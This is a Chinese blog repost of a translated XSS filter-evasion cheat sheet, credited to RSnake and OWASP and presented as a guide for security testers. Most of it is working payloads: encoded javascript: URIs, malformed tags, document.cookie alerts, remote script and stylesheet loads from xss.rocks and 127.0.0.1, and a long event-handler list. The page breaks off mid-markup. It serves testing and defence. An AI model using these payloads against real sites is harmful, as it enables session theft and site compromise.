专业编程基础技术教程

网站首页 > 基础教程 正文

XSS攻击绕过过滤方法大全(约100种)

ccvgpt 2025-02-04 13:02:37 基础教程 1 ℃

虽然说很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS注入。

这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录,现在此XSS备忘录将由OWASP维护和完善它。

OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Cheat Sheet 灵感来源于 RSnake 的 XSS Cheat Sheet,所以我们对他给予我们的启发表示感谢。我们想要去创建短小简单的参考给开发者以便帮助他们预防 XSS漏洞,而不是简单的告诉他们需要使用复杂的方法构建应用来预防各种千奇百怪的攻击,这也是OWASP 备忘录系列诞生的原因。

XSS绕过过滤具体方法如下:

1、XSS定位器

在大多数存在漏洞且不需要特定XSS攻击代码的地方插入下列代码会弹出包含“XSS”字样的对话框。使用URL编码器来对整个代码进行编码。

小技巧:如果你时间很紧想要快速检查页面,通常只要插入“<任意文本>”标签,然后观察页面输出是否明显改变了就可以判断是否存在漏洞:

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;

alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–

>”>’>

2、XSS定位器(短)

如果你没有足够的空间并且知道页面上没有存在漏洞的JavaScript,这个字符串是一个不错的简洁XSS注入检查。注入后查看页面源代码并且寻找是否存在**

”;!–”=&{()}

3、无过滤绕过

这是一个常规的XSS注入代码,虽然通常它会被防御,但是建议首先去测试一下。(引号在任何现代浏览器中都不需要,所以这里省略了它):

4、利用多语言进行过滤绕过

‘”>>”>

<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script>

<script>alert(document.cookie)</script>”>

<img/id=”confirm(1)”/alt=”/”src=”/”onerror=eval(id)>’”>

<img src=”https://www.fujieace.com/wp-content/images/2015/07/hacked-compressor.jpg“></code></pre><h1 class="pgc-h-arrow-right" data-track="378">5、通过JavaScript命令实现的图片XSS</h1><p data-track="426">图片注入使用JavaScript命令实现(IE7.0 不支持在图片上下文中使用JavaScript 命令,但是可以在其他上下文触发。下面的例子展示了一种其他标签依旧通用的原理):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”javascript:alert(‘XSS’);”></code></pre><h1 class="pgc-h-arrow-right" data-track="381">6、无分号无引号</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=javascript:alert(‘XSS’)></code></pre><h1 class="pgc-h-arrow-right" data-track="383">7、不区分大小写的XSS攻击向量</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=JaVaScRiPt:alert(‘XSS’)></code></pre><h1 class="pgc-h-arrow-right" data-track="385">8、HTML实体</h1><p data-track="427">必须有分号才可生效</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=javascript:alert("XSS")></code></pre><h1 class="pgc-h-arrow-right" data-track="388">9、重音符混淆</h1><p data-track="428">如果你的JavaScript代码中需要同时使用单引号和双引号,那么可以使用重音符(`)来包含JavaScript 代码。这通常会有很大帮助,因为大部分跨站脚本过滤器都没有过滤这个字符:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`></code></pre><h1 class="pgc-h-arrow-right" data-track="391">10.、畸形的A标签</h1><p data-track="429">跳过HREF标签找到XSS的重点…由DavidCross提交~已在Chrome上验证:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><a onmouseover=”alert(document.cookie)”>xxs link</a></code></pre><p data-track="430">此外Chrome经常帮你补全确实的引号…如果在这方面遇到问题就直接省略引号,Chrome会帮你补全在URL或脚本中缺少的引号。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><a onmouseover=alert(document.cookie)>xxs link</a></code></pre><h1 class="pgc-h-arrow-right" data-track="396">11、畸形的IMG标签</h1><p data-track="397">最初由Begeek发现(短小精湛适用于所有浏览器),这个XSS攻击向量使用了不严格的渲染引擎来构造含有IMG标签并被引号包含的XSS攻击向量。我猜测这种解析原来是为了兼容不规范的编码。这会让它更加难以正确的解析HTML标签:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”></code></pre><h1 class="pgc-h-arrow-right" data-track="399">12、fromCharCode函数</h1><p data-track="400">如果不允许任何形式的引号,你可以通过执行JavaScript里的fromCharCode函数来创建任何你需要的XSS攻击向量:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code></pre><h1 class="pgc-h-arrow-right" data-track="402">13、使用默认SRC属性绕过SRC域名过滤器</h1><p data-track="403">这种方法可以绕过大多数SRC域名过滤器。将JavaScript代码插入事件方法同样适用于注入使用elements的任何HTML标签,例如Form,Iframe, Input, Embed等等。它同样允许将事件替换为任何标签中可用的事件类型,例如onblur,onclick。下面会给出许多不同的可注入事件列表。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=# onmouseover=”alert(‘xxs’)”></code></pre><h1 class="pgc-h-arrow-right" data-track="405">14、使用默认为空的SRC属性</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC= onmouseover=”alert(‘xxs’)”></code></pre><h1 class="pgc-h-arrow-right" data-track="407">15、使用不含SRC属性</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG onmouseover=”alert(‘xxs’)”></code></pre><h1 class="pgc-h-arrow-right" data-track="409">16、通过error事件触发alert</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img></code></pre><h1 class="pgc-h-arrow-right" data-track="411">17、对IMG标签中onerror属性进行编码</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><img src=x onerror=”javascript:alert('XSS')″></code></pre><h1 class="pgc-h-arrow-right" data-track="413">18、十进制HTML字符实体编码</h1><p data-track="414">所有在IMG标签里直接使用javascript:形式的XSS示例无法在Firefox或Netscape8.1以上浏览器(使用Gecko渲染引擎)运行。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=javascript:alert(

'XSS')></code></pre><h1 class="pgc-h-arrow-right" data-track="416">19、不带分号的十进制HTML字符实体编码</h1><p data-track="417">这对于绕过对“&#XX;”形式的XSS过滤非常有用,因为大多数人不知道最长可使用7位数字。这同样对例如$tmp_string =~s/.<em>&#(\d+);.</em>/$1/;形式的过滤器有效,这种过滤器是错误的认为HTML字符实体编码需要用分号结尾(无意中发现的):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=javascript:a&

#0000108ert('XSS')></code></pre><h1 class="pgc-h-arrow-right" data-track="419">20、不带分号的十六进制HTML字符实体编码</h1><p data-track="420">这是有效绕过例如$tmp_string =~ s/.<em>&#(\d+);.</em>/$1/;过滤器的方法。这种过滤器错误的认为#号后会跟着数字(十六进制HTML字符实体编码并非如此)</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=javascript:alert('XSS')></code></pre><h1 class="pgc-h-arrow-right" data-track="431">21、内嵌TAB</h1><p data-track="432">使用TAB来分开XSS攻击代码:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”jav ascript:alert(‘XSS’);”></code></pre><h1 class="pgc-h-arrow-right" data-track="434">22、内嵌编码后TAB</h1><p data-track="435">使用编码后的TAB来分开XSS攻击代码:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”jav	ascript:alert(‘XSS’);”>
1</code></pre><h1 class="pgc-h-arrow-right" data-track="437">23、内嵌换行分隔XSS攻击代码</h1><p data-track="438">一些网站声称09到13(十进制)的HTML实体字符都可以实现这种攻击,这是不正确的。只有09(TAB),10(换行)和13(回车)有效。查看ASCII字符表获取更多细节。下面几个XSS示例介绍了这些向量。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”jav
ascript:alert(‘XSS’);”></code></pre><h1 class="pgc-h-arrow-right" data-track="440">24、内嵌回车分隔XSS攻击代码</h1><p data-track="441">注意:上面使用了比实际需要长的字符串是因为0可以忽略。经常可以遇到过滤器解码十六进制和十进制编码时认为只有2到3位字符。实际规则是1至7位字符:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”jav
ascript:alert(‘XSS’);”></code></pre><h1 class="pgc-h-arrow-right" data-track="443">25、使用空字符分隔JavaScript指令</h1><p data-track="444">空字符同样可以作为XSS攻击向量,但和上面有所区别,你需要使用一些例如Burp工具或在URL字符串里使用%00,亦或你想使用VIM编写自己的注入工具(V@会生成空字符),[email protected]?Opera浏览器(例如Windows版的7.11)还会受另一个字符173(软连字符)的影响。但是空字符%00更加有用并且能帮助绕过真实世界里的过滤器,例如这个例子里的变形:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out</code></pre><h1 class="pgc-h-arrow-right" data-track="446">26、利用IMG标签中JavaScript指令前的空格和元字符</h1><p data-track="447">如果过滤器不计算”javascript:”前的空格,这是正确的,因为它们不会被解析,但这点非常有用。因为这会造成错误的假设,就是引号和”javascript:”字样间不能有任何字符。实际情况是你可以插入任何十进制的1至32号字符:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”   javascript:alert(‘XSS’);”></code></pre><h1 class="pgc-h-arrow-right" data-track="449">27、利用非字母非数字字符</h1><p data-track="450">FireFox的HTML解析器认为HTML关键词后不能有非字母非数字字符,并且认为这是一个空白或在HTML标签后的无效符号。但问题是有的XSS过滤器认为它们要查找的标记会被空白字符分隔。例如”<SCRIPT\s” != “<SCRIPT/XSS\s”:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT/XSS SRC=”http://xss.rocks/xss.js“></SCRIPT></code></pre><p data-track="452">基于上面的原理,可以使用模糊测试进行扩展。Gecko渲染引擎允许任何字符包括字母,数字或特殊字符(例如引号,尖括号等)存在于事件名称和等号之间,这会使得更加容易绕过跨站脚本过滤。注意这同样适用于下面看到的重音符:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)></code></pre><p data-track="454">Yair Amit让我注意到了IE和Gecko渲染引擎有一点不同行为,在于是否在HTML标签和参数之间允许一个不含空格的斜杠。这会非常有用如果系统不允许空格的时候。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT/SRC=”http://127.0.0.1/xss.js“></SCRIPT></code></pre><h1 class="pgc-h-arrow-right" data-track="456">28、额外的尖括号</h1><p data-track="457">由Franz Sedlmaier提交,这个XSS攻击向量可以绕过某些检测引擎,比如先查找第一个匹配的尖括号,然后比较里面的标签内容,而不是使用更有效的算法,例如Boyer-Moore算法就是查找整个字符串中的尖括号和相应标签(当然是通过模糊匹配)。双斜杠注释了额外的尖括号来防止出现JavaScript错误:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><<SCRIPT>alert(“XSS”);//<</SCRIPT></code></pre><h1 class="pgc-h-arrow-right" data-track="459">29、未闭合的script标签</h1><p data-track="460">在Firefox和Netscape 8.1的Gecko渲染引擎下你不是必须构造类似“>”的跨站脚本攻击向量。Firefox假定闭合HTML标签是安全的并且会为你添加闭合标记。多么体贴!不像不影响Firefox的下一个问题,这不需要在后面有额外的HTML标签。如果需要可以添加引号,但通常是没有必要的,需要注意的是,我并不知道这样注入后HTML会什么样子结束:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT SRC=http://127.0.0.1/xss.js?< B ></code></pre><h1 class="pgc-h-arrow-right" data-track="462">30、script标签中的协议解析</h1><p data-track="463">这个特定的变体是由?ukasz Pilorz提交的并且基于Ozh提供的协议解析绕过。这个跨站脚本示例在IE和Netscape的IE渲染模式下有效,如果添加了标记在Opera中也可以。这在输入空间有限的情况下是非常有用的,你所使用的域名越短越好。”.j”是可用的,在SCRIPT标签中不需要考虑编码类型因为浏览器会自动识别。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><SCRIPT SRC=//xss.rocks/.j></code></pre><h1 class="pgc-h-arrow-right" data-track="465">31、只含左尖括号的HTML/JavaScript XSS向量</h1><p data-track="466">IE渲染引擎不像Firefox,不会向页面中添加额外数据。但它允许在IMG标签中直接使用javascript。这对构造攻击向量是很有用的,因为不需要闭合尖括号。这使得有任何HTML标签都可以进行跨站脚本攻击向量注入。甚至可以不使用”>”闭合标签。注意:这会让HTML页面变得混乱,具体程度取决于下面的HTML标签。这可以绕过以下NIDS正则:/((%3D)|(=))[\n]*((%3C)|<)[\n]+((%3E)|>)/因为不需要”>”闭合。另外在实际对抗XSS过滤器的时候,使用一个半开放的<IFRAME标签替代<IMG标签也是非常有效的。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”javascript:alert(‘XSS’)”</code></pre><h1 class="pgc-h-arrow-right" data-track="468">32、多个左尖括号</h1><p data-track="469">使用一个左尖括号替代右尖括号作为标签结尾的攻击向量会在不同浏览器的Gecko渲染引擎下有不同表现。没有左尖括号时,在Firefox中生效,而在Netscape中无效。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><iframe src=http://127.0.0.1/scriptlet.html <</code></pre><h1 class="pgc-h-arrow-right" data-track="471">33、JavaScript双重转义</h1><p data-track="472">当应用将一些用户输入输出到例如:,这时双引号不会被转义并且可以触发跨站脚本攻击向量。XSS定位器就用了这种方法:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>\”;alert(‘XSS’);//</code></pre><p data-track="474">另一种情况是,如果内嵌数据进行了正确的JSON或JavaScript转义,但没有HTML编码,那可以结束原有脚本块并开始你自己的:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code></script><script>alert(‘XSS’);</script></code></pre><h1 class="pgc-h-arrow-right" data-track="476">34、闭合title标签</h1><p data-track="477">这是一个简单的闭合</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code></TITLE><SCRIPT>alert(“XSS”);</SCRIPT></code></pre><h1 class="pgc-h-arrow-right" data-track="479">35、INPUT image</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”></code></pre><h1 class="pgc-h-arrow-right" data-track="481">36、BODY image</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><BODY BACKGROUND=”javascript:alert(‘XSS’)”></code></pre><h1 class="pgc-h-arrow-right" data-track="483">37、IMG Dynsrc</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG DYNSRC=”javascript:alert(‘XSS’)”></code></pre><h1 class="pgc-h-arrow-right" data-track="485">38、IMG lowsrc</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG LOWSRC=”javascript:alert(‘XSS’)”></code></pre><h1 class="pgc-h-arrow-right" data-track="487">39、List-style-image</h1><p data-track="488">处理嵌入的图片列表是很麻烦的问题。由于JavaScript指令的原因只能在IE渲染引擎下有效。不是一个特别有用的跨站脚本攻击向量:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br></code></pre><h1 class="pgc-h-arrow-right" data-track="490">40、图片中引用VBscript</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=’vbscript:msgbox(“XSS”)’></code></pre><h1 class="pgc-h-arrow-right" data-track="492">41、Livescript (仅限旧版本Netscape)</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG SRC=”livescript:[code]"></code></pre><h1 class="pgc-h-arrow-right" data-track="494">42、SVG对象标签</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><svg/onload=alert('XSS')></code></pre><h1 class="pgc-h-arrow-right" data-track="496">43、ECMAScript 6</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>Set.constructor`alert\x28document.domain\x29```</code></pre><h1 class="pgc-h-arrow-right" data-track="498">44、BODY标签</h1><p data-track="499">这个方法不需要使用任何例如"javascript:“或”<SCRIPT…"语句来完成XSS攻击。Dan Crowley特别提醒你可以在等号前加入一个空格(“οnlοad=” != “onload =”):</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><BODY ONLOAD=alert('XSS')></code></pre><h1 class="pgc-h-arrow-right" data-track="501">45、事件处理程序</h1><p data-track="502">在XSS攻击中可使用以下事件(在完稿的时候这是网上最全的列表了)。感谢ReneLedosquet的更新。</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>1.    FSCommand() (攻击者当需要在嵌入的Flash对象中执行时可以使用此事件)

2.    onAbort() (当用户中止加载图片时)

3.    onActivate() (当对象激活时)

4.    onAfterPrint() (用户打印或进行打印预览后触发)

5.    onAfterUpdate() (从数据源对象更新数据后由数据对象触发)

6.    onBeforeActivate() (在对象设置为激活元素前触发)

7.    onBeforeCopy() (攻击者在选中部分拷贝到剪贴板前执行攻击代码-攻击者可以通过执行execCommand("Copy")函数触发)

8.    onBeforeCut() (攻击者在选中部分剪切到剪贴板前执行攻击代码)

9.    onBeforeDeactivate() (在当前对象的激活元素变化前触发)

10.  onBeforeEditFocus() (在一个包含可编辑元素的对象进入激活状态时或一个可编辑的对象被选中时触发)

11.  onBeforePaste() (在用户被诱导进行粘贴前或使用execCommand("Paste")函数触发)

12.  onBeforePrint() (用户需要被诱导进行打印或攻击者可以使用print()或execCommand("Print")函数).

13.  onBeforeUnload() (用户需要被诱导关闭浏览器-除非从父窗口执行,否则攻击者不能关闭当前窗口)

14.  onBeforeUpdate() (从数据源对象更新数据前由数据对象触发)

15.  onBegin() (当元素周期开始时由onbegin 事件立即触发)

16.  onBlur() (另一个窗口弹出当前窗口失去焦点时触发)

17.  onBounce() (当marquee对象的behavior属性设置为“alternate”且字幕的滚动内容到达窗口一边时触发)

18.  onCellChange() (当数据提供者的数据变化时触发)

19.  onChange() (select,text, 或TEXTAREA字段失去焦点并且值发生变化时触发)

20.  onClick() (表单中点击触发)

21.  onContextMenu() (用户需要在攻击区域点击右键)

22.  onControlSelect() (当用户在一个对象上创建控件选中区时触发)

23.  onCopy() (用户需要复制一些东西或使用execCommand("Copy")命令时触发)

24.  onCut() (用户需要剪切一些东西或使用execCommand("Cut")命令时触发)

25.  onDataAvailable() (用户需要修改元素中的数据,或者由攻击者提供的类似功能)

26.  onDataSetChanged() (当数据源对象变更导致数据集发生变更时触发)

27.  onDataSetComplete() (数据源对象中所有数据可用时触发)

28.  onDblClick() (用户双击一个表单元素或链接)

29.  onDeactivate() (在激活元素从当前对象转换到父文档中的另一个对象时触发)

30.  onDrag() (在元素正在拖动时触发)

31.  onDragEnd() (当用户完成元素的拖动时触发)

32.  onDragLeave() (用户在拖动元素离开放置目标时触发)

33.  onDragEnter() (用户将对象拖拽到合法拖曳目标)

34.  onDragOver() (用户将对象拖拽划过合法拖曳目标)

35.  onDragDrop() (用户将一个对象(例如文件)拖拽到浏览器窗口)

36.  onDragStart() (当用户开始拖动元素时触发)

37.  onDrop() (当拖动元素放置在目标区域时触发)

38.  onEnded() (在视频/音频(audio/video)播放结束时触发)

39.  onError() (在加载文档或图像时发生错误)

40.  onErrorUpdate() (当从数据源对象更新相关数据遇到错误时在数据绑定对象上触发)

41.  onFilterChange() (当滤镜完成状态变更时触发)

42.  onFinish() (当marquee完成滚动时攻击者可以执行攻击)

43.  onFocus() (当窗口获得焦点时攻击者可以执行攻击代码)

44.  onFocusIn() (当元素将要被设置为焦点之前触发)

45.  onFocusOut() (攻击者可以在窗口失去焦点时触发攻击代码)

46.  onHashChange() (当锚部分发生变化时触发攻击代码)

47.  onHelp() (攻击者可以在用户在当前窗体激活时按下F1触发攻击代码)

48.  onInput() (在 <input> 或 <textarea> 元素的值发生改变时触发)

49.  onKeyDown() (用户按下一个键的时候触发)

50.  onKeyPress() (在键盘按键被按下并释放一个键时触发)

51.  onKeyUp() (用户释放一个键时触发)

52.  onLayoutComplete() (用户进行完打印或打印预览时触发)

53.  onLoad() (攻击者在窗口加载后触发攻击代码)

54.  onLoseCapture() (可以由releaseCapture()方法触发)

55.  onMediaComplete() (当一个流媒体文件使用时,这个事件可以在文件播放前触发)

56.  onMediaError() (当用户在浏览器中打开一个包含媒体文件的页面,出现问题时触发事件)

57.  onMessage() (当页面收到一个信息时触发事件)

58.  onMouseDown() (攻击者需要让用户点击一个图片触发事件)

59.  onMouseEnter() (光标移动到一个对象或区域时触发)

60.  onMouseLeave() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)

61.  onMouseMove() (攻击者需要让用户将光标移到一个图片或表格)

62.  onMouseOut() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)

63.  onMouseOver() (光标移动到一个对象或区域)

64.  onMouseUp() (攻击者需要让用户点击一个图片)

65.  onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)

66.  onMove() (用户或攻击者移动页面时触发)

67.  onMoveEnd() (用户或攻击者移动页面结束时触发)

68.  onMoveStart() (用户或攻击者开始移动页面时触发)

69.  onOffline() (当浏览器从在线模式切换到离线模式时触发)

70.  onOnline() (当浏览器从离线模式切换到在线模式时触发)

71.  onOutOfSync() (当元素与当前时间线失去同步时触发)

72.  onPaste() (用户进行粘贴时或攻击者可以使用execCommand("Paste")函数时触发)

73.  onPause() (在视频或音频暂停时触发)

74.  onPopState() (在窗口的浏览历史(history 对象)发生改变时触发)

75.  onProgress() (攻击者可以在一个FLASH加载时触发事件)

76.  onPropertyChange() (用户或攻击者需要改变元素属性时触发)

77.  onReadyStateChange() (每次 readyState 属性变化时被自动调用)

78.  onRedo() (用户返回上一页面时触发)

79.  onRepeat() (事件在播放完重复播放时触发)

80.  onReset() (用户或攻击者重置表单时触发)

81.  onResize() (用户改变窗口大小时,攻击者可以自动以这种方法触发:<SCRIPT>self.resizeTo(500,400);</SCRIPT>)

82.  onResizeEnd() (用户完成改变窗体大小时触发)

83.  onResizeStart() (用户开始改变窗体大小时触发)

84.  onResume() (当元素继续播放时触发)

85.  onReverse() (当元素回放时触发)

86.  onRowsEnter() (用户或攻击者需要改变数据源中的一行)

87.  onRowExit() (用户或攻击者改变数据源中的一行后退出时触发)

88.  onRowDelete() (用户或攻击者需要删除数据源中的一行)

89.  onRowInserted() (user or attacker would needto insert a row in a data source)

90.  onScroll() (用户需要滚动或攻击者使用scrollBy()函数)

91.  onSeek() (当用户在元素上执行查找操作时触发)

92.  onSelect() (用户需要选择一些文本-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)

93.  onSelectionChange() (当用户选择文本变化时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)

94.  onSelectStart() (当用户开始选择文本时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)

95.  onStart() (在marquee 对象开始循环时触发)

96.  onStop() (当用户按下停止按钮或离开页面时触发)

97.  onStorage() (当Web Storage更新时触发)

98.  onSyncRestored() (当元素与它的时间线恢复同步时触发)

99.  onSubmit() (需要用户或攻击者提交表单)

100.onTimeError() (用户或攻击者设置时间属性出现错误时触发)

101.onTrackChange() (用户或攻击者改变播放列表内歌曲时触发)

102.onUndo() (用户返回上一浏览记录页面时触发)

103.onUnload() (用户点击任意链接或按下后退按钮或攻击者强制进行点击时触发)

104.onURLFlip() (当一个高级流媒体格式(ASF)文件,由一个HTML+TIME(基于时间交互的多媒体扩展)媒体标签播放时,可触发在ASF文件中内嵌的攻击脚本)

105.seekSegmentTime() (这是一个方法可以定位元素某个时间段内中的特定的点,并可以从该点播放。这个段落包含了一个重复的时间线,并包括使用AUTOREVERSE属性进行反向播放。</code></pre><h1 class="pgc-h-arrow-right" data-track="713">46、BGSOUND</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><BGSOUND SRC="javascript:alert('XSS');"></code></pre><h1 class="pgc-h-arrow-right" data-track="715">47、& JavaScript包含</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><BR SIZE="&{alert('XSS')}"></code></pre><h1 class="pgc-h-arrow-right" data-track="717">48、样式表</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code></pre><h1 class="pgc-h-arrow-right" data-track="719">49、远程样式表</h1><p data-track="720">(利用像远程样式表一样简单的形式,你可以将XSS攻击代码包含在可使用内置表达式进行重定义的样式参数里。)这只在IE和使用IE渲染模式Netscape8.1+。注意这里没有任何元素在页面中表明这页面包含了JavaScript。提示:这些远程样式表都使用了body标签,所以必须在页面中有除了攻击向量以外的内容存在时才会生效, 也就是如果是空白页的话你必须在页面添加一个字母来让攻击代码生效:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><LINK REL="stylesheet" HREF="http://127.0.0.1/xss.css"></code></pre><h1 class="pgc-h-arrow-right" data-track="722">50、远程样式表2</h1><p data-track="723">这个和上面一样有效,不过使用了标签。在进行跨站脚本攻击时,如不能同时使用等号或斜杠,这是非常有用的,这种情况在现实世界里不止一次发生了:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE>@import'http://127.0.0.1/xss.css';</STYLE></code></pre><h1 class="pgc-h-arrow-right" data-track="725">51、远程样式表3</h1><p data-track="726">这种方式仅在Opera 8.0(9.x不可以)中有效,但方法比较有创意. 根据RFC2616,设置一个Link头部不是HTTP1.1规范的一部分,但一些浏览器仍然允许这样做 (例如Firefox和 Opera). 这里的技巧是设置一个头部(和普通头部并没有什么区别,只是设置Link: http://xss.rocks/xss.css; REL=stylesheet)并且在远程样式表中包含使用了JavaScript的跨站脚本攻击向量,这一点是FireFox不支持的:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><META HTTP-EQUIV="Link" Content="<http://127.0.0.1/xss.css>; REL=stylesheet"></code></pre><h1 class="pgc-h-arrow-right" data-track="728">52、远程样式表4</h1><p data-track="729">这仅能在Gecko渲染引擎下有效并且需要在父页面绑定一个XML文件。具有讽刺意味的是 Netscape认为Gecko更安全 ,所以对绝大多数网站来说会受到漏洞影响:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE>BODY{-moz-binding:url("https://127.0.0.1/xssmoz.xml#xss")}</STYLE></code></pre><h1 class="pgc-h-arrow-right" data-track="731">53、含有分隔JavaScript的STYLE标签</h1><p data-track="732">这个XSS会在IE中造成无限循环:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></code></pre><h1 class="pgc-h-arrow-right" data-track="734">54、STYLE属性中使用注释分隔表达式</h1><p data-track="735">由Roman Ivanov创建</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code></pre><h1 class="pgc-h-arrow-right" data-track="737">55、含表达式的IMG STYLE</h1><p data-track="738">这是一个将上面XSS攻击向量混合的方法,但确实展示了STYLE标签可以用相当复杂的方式分隔,和上面一样,也会让IE进入死循环:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'></code></pre><h1 class="pgc-h-arrow-right" data-track="740">56、STYLE标签(仅旧版本Netscape可用)</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code></pre><h1 class="pgc-h-arrow-right" data-track="742">57、使用背景图像的STYLE标签</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code></pre><h1 class="pgc-h-arrow-right" data-track="744">58、使用背景的STYLE标签</h1><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code></pre><h1 class="pgc-h-arrow-right" data-track="746">59、含STYLE属性的HTML任意标签</h1><p data-track="747">IE6.0和IE渲染引擎模式下的Netscape 8.1+并不关心你建立的HTML标签是否存在,只要是由尖括号和字母开始的即可:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><XSS STYLE="behavior: url(xss.htc);"></code></pre><h1 class="pgc-h-arrow-right" data-track="749">60、本地htc文件</h1><p data-track="750">这和上面两个跨站脚本攻击向量有些不同,因为它使用了一个必须和XSS攻击向量在相同服务器上的.htc文件。这个示例文件通过下载JavaScript并将其作为style属性的一部分运行来进行攻击:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code><XSS STYLE="behavior: url(xss.htc);"></code></pre><h1 class="pgc-h-arrow-right" data-track="752">61、US-ASCII编码</h1><p data-track="753">US-ASCII编码(由Kurt Huwig发现)。它使用了畸形的7位ASCII编码来代替8位。这个XSS攻击向量可以绕过大多数内容过滤器,但是只在主机使用US-ASCII编码传输数据时有效,或者可以自己设置编码格式。相对绕过服务器端过滤,这在绕过WAF跨站脚本过滤时候更有效。Apache Tomcat是目前唯一已知使用US-ASCII编码传输的:</p><pre class="prism-highlight prism-language-bash" class="syl-page-code"><code>?script?alert(¢XSS¢)?/script?</code></pre><h1 class="pgc-h-arrow-right" data-track="755">62、META</h1><p data-track="756">关于meta刷新比较奇怪的是它并不会在头部中发送一个referrer-所以它通常用于不需要referrer的时候:</p><pre class="prism-highlight prism-language-bash" 